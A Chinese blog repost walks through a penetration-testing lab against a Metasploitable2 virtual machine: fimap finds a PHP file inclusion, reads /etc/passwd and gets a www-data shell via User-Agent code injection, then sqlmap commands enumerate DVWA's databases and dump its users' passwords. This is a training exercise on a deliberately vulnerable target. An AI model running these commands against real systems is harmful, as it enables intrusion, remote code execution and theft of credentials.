metasploitable实践

最新推荐文章于 2024-04-18 23:31:53 发布
最新推荐文章于 2024-04-18 23:31:53 发布
阅读量145 收藏
点赞数
原文链接:http://www.cnblogs.com/q-z-y/p/6958178.html
版权

使用Fimap和metasploitable2文件包含漏洞测试

fimap

首先查看msf已经存在的漏洞:
1115766-20170325140625315-1729858074.png
1115766-20170325140644611-1801450844.png
1115766-20170325140659971-1373786052.png

root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'
[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...
[05:57:09] [INFO] Fiddling around with URL...
[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.
[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...
[05:57:09] [INFO] Scriptpath received: '/var/www'
[05:57:09] [INFO] Operating System is 'Unix-Like'.
[05:57:09] [INFO] Testing file '/etc/passwd'...
[05:57:09] [INFO] Testing file '/proc/self/environ'...
[05:57:09] [INFO] Testing file 'php://input'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...
[05:57:09] [INFO] Testing file '/apache/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache/logs/access_log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...
[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/log/access_log'...
[05:57:10] [INFO] Testing file '/var/log/access.log'...
[05:57:10] [INFO] Testing file '/logs/access.log'...
[05:57:10] [INFO] Testing file '/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/log/auth.log'...
[05:57:10] [INFO] Testing file '/var/log/secure'...
[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
##################################################################
#[1] Possible PHP-File Inclusion                                 #
##################################################################
#::REQUEST                                                       #
#  [URL]        http://192.168.136.130/lfi.php?page=index.php    #
#  [HEAD SENT]                                                   #
#::VULN INFO                                                     #
#  [GET PARAM]  page                                             #
#  [PATH]       /var/www                                         #
#  [OS]         Unix                                             #
#  [TYPE]       Absolute Clean                                   #
#  [TRUNCATION] No Need. It's clean.                             #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd                              #
#                   [1] /proc/self/environ                       #
#                   [2] /var/log/auth.log                        #
##################################################################
root@kali:~# clear
root@kali:~# fimap -x --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###########################
#:: List of Domains ::    #
###########################
#[1] 192.168.136.130      #
#[q] Quit                 #
###########################
Choose Domain: 1
#####################################################################################################
#:: FI Bugs on '192.168.136.130' ::                                                                 #
#####################################################################################################
#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #
#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page'     #
#[q] Quit                                                                                           #
#####################################################################################################
Choose vulnerable script: 1
[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...
[06:01:09] [OUT] PHP Injection works! Testing if execution works...
[06:01:09] [INFO] Testing execution thru 'popen[b64]'...
[06:01:09] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks - PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey's reverse shell           #
#[3] [Test Plugin] Show some info                  #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www$>

使用sqlmap和metasploitable2进行SQL注入实验

实验环境是kali的sqlmap和metasploit2.
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low'

1115766-20170330224148649-1226305738.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-user

1115766-20170330224159633-593723258.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-db

1115766-20170330224208883-596377676.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -dbs

1115766-20170330224219789-492631776.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -users

1115766-20170330224230461-370668387.png

1115766-20170330224247289-620723420.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --table -D dvwa

1115766-20170330224303602-954969971.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --column -T users -D dvwa

1115766-20170330224312055-338169869.png

root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --dump -C user,password -T users -D dvwa

1115766-20170330224322070-180518762.png

转载于:https://www.cnblogs.com/q-z-y/p/6958178.html

weixin_30419799
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Metasploitable渗透测试实战:ms17-010
weixin_68951704的博客
05-05 2910
漏洞简介: 永恒之蓝(即ms17-010)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件
Metasploitable安装与介绍
永远是少年
06-01 4700
今天继续给大家介绍渗透测试相关知识,本文主要内容是Metasploitable安装与介绍。 一、Metasploitable介绍 二、Metasploitable下载 三、Metasploitable安装 四、Metasploitable修改网络配置
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
网络渗透测试实验三--XSS和SQL注入
weixin_51646864的博客
12-05 629
网络渗透测试实验实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭
SQL注入部分:DVWA+SQLmap+Mysql注入实战
qq_51650968的博客
12-04 857
实验环境搭建。启动Metasploitable2虚拟机 首先在kali上扫描到metasploitable2的ip地址 nmap 192.168.75.0/24 找到靶机ip 在kali的firefox浏览器上搜索ip地址并打开DVWA 在DVWA Security上修改安全等级为low 然后进行注入点发现 在SQL Injection上id搜索1 可以看见上方地址栏有显示id=1 再次输入1,报错,返回 You have an error in your SQL syntax; check th
metasploitable-linux-2.0.0.zip
09-01
Metasploitable Linux 2.0.0:网络安全研究与漏洞利用的模拟环境》 Metasploitable是一个专门设计用于网络安全测试...无论是为了个人技能提升,还是为了企业内部的安全培训,Metasploitable都提供了宝贵的实践平台。
Metasploitable2-Linux.7z
02-26
这个Linux版本的Metasploitable2包含了多个服务和应用,这些服务和应用都存在已知的安全弱点,便于学习者理解和实践如何发现并利用这些漏洞。 【标签】"安全漏洞" 标签明确了这个资源的核心价值,即它是一个用于...
Metasploitable_ubuntu-book.zip
07-14
在本例中,这个靶机是基于Ubuntu构建的,名为"Metasploitable",其主要目的是为了帮助用户理解和实践渗透测试技术,特别是针对Samba服务的漏洞利用。 Samba服务是Linux和Unix系统中用于实现与Windows网络共享的软件...
vulhub渗透测试靶机学习1
08-08
渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的分析和攻击。 首先,...
metasploitable2--简介--漏洞利用
weixin_45018333的博客
03-16 7276
1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句:原来觉得搭建环境是很没有必要的,应该拿实际的网络去练习,但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建,太麻烦,但是现在忽然明白...
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
xnxqwzy的博客
10-20 672
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
metasploitable2,3漏洞加固
虚心学习,脚踏实地
05-03 1662
metasploitable2,3攻击及加固
Metasploit用法大全
weixin_30807779的博客
01-24 803
Metasploit用户接口msfconsoleArmitage: KaliGUI启动;armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的Microso...
渗透测试——四、服务漏洞
钟言的博客
12-03 9884
本篇为学习渗透测试的第五课,黑客实践之服务漏洞,详细内容包含了认识Metasploitable2网络靶机 1、Metasploitable2网络靶机 2、Linux常用命令 3、Linux服务配置文件 4、Metasploitable2切换root账户 5、Metasploitable2建立并访问网页文件 6、Metasploitable2服务停止 利用弱密码漏洞渗透网络靶机 1、Telnet 和SSH 2、Hydra 和Medusa 3、MySQL与PostgreSQL 4、破解远程登陆密码 5、V等等
Metasploit渗透测试框架
qq_44237206的博客
05-16 498
Metasploit简介 Metasploit是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括Metasploit框架及其商业对手,如Metasploit Pro。 Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补..
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
天下著书立传者,皆为我师
04-18 464
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
Metasploitable 2 漏洞演练系统使用指南
JackLiu16的博客
03-02 1万+
Metasploitable 2 漏洞演练系统使用指南 又是一篇翻译文,感觉国外大叔们真心不错~很早就看见这篇外文,感觉不错。结果就有人翻译出来了。。。比鸟文好看=。=====翻译by:月巴_又鸟今天要给大家介绍的是Metasploitable漏洞演练系统,他的作用是用来作为MSF...
metasploitable2 postgresql渗透测试
最新发布
07-07
Metasploitable 2是一个广泛使用的渗透测试框架,它包含了一个模拟的漏洞密集型系统,供安全研究人员、 penetration testers 和教育者学习和实践网络安全技能。其中 PostgreSQL 是 Metasploitable 2中的一个模块,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值